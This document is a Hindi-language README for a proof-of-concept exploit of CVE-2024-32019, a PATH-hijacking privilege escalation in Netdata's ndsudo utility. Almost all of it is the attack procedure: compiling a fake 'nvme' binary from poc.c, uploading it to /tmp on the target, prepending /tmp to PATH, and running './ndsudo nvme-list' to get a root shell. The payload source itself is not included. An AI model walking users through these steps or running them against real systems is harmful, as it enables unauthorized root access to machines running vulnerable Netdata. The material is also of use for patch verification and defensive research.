
netdata ndsudo कमजोरी के लिए POC - CVE-2024-32019
ndsudo के माध्यम से विशेषाधिकार वृद्धि (Netdata स्थानीय शोषण)यह POC Netdata के साथ बंडल की गई एक कमजोर ndsudo उपयोगिता का शोषण करके स्थानीय विशेषाधिकारों को रूट तक बढ़ाने के लिए उपयोग किया जाता है। यह शोषण उपयोगकर्ता के PATH में एक दुर्भावनापूर्ण बाइनरी इंजेक्ट करके काम करता है जो एक विश्वसनीय कमांड (nvme) का रूप धारण करता है और ndsudo द्वारा रूट विशेषाधिकारों के साथ निष्पादित किया जाता है।
आपके पास लक्ष्य प्रणाली पर स्थानीय शेल पहुँच है।
आप निम्न कमांड निष्पादित कर सकते हैं लेकिन यह "not found" या समान त्रुटि के साथ विफल होता है:
./ndsudo nvme-list
अपनी हमलावर मशीन (या कमजोर सिस्टम यदि उसमें कंपाइलर है) पर, बाइनरी को संकलित करें (उदाहरण के लिए, रिपॉजिटरी में फ़ाइल poc.c से):
gcc poc.c -o nvme
यह बाइनरी रूट शेल उत्पन्न करने या रूट विशेषाधिकारों के साथ मनमाना कमांड निष्पादित करने के लिए तैयार की जानी चाहिए।
संकलित nvme बाइनरी को अपने उपयोगकर्ता द्वारा लिखने योग्य निर्देशिका में ले जाएँ या अपलोड करें, जैसे /tmp:
scp nvme user@target:/tmp/
# या कोई भी फ़ाइल अपलोड विधि जो आपके पास है
लक्ष्य प्रणाली पर, सुनिश्चित करें कि बाइनरी निष्पादन योग्य है और अपने PATH में उसकी निर्देशिका को प्रस्तुत करें:
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
यह सुनिश्चित करता है कि ndsudo वैध के बजाय आपके दुर्भावनापूर्ण nvme को हल और निष्पादित करेगा।
ndsudo ट्रिगर करेंndsudo को ट्रिगर करने के लिए कमजोर कमांड चलाएँ:
./ndsudo nvme-list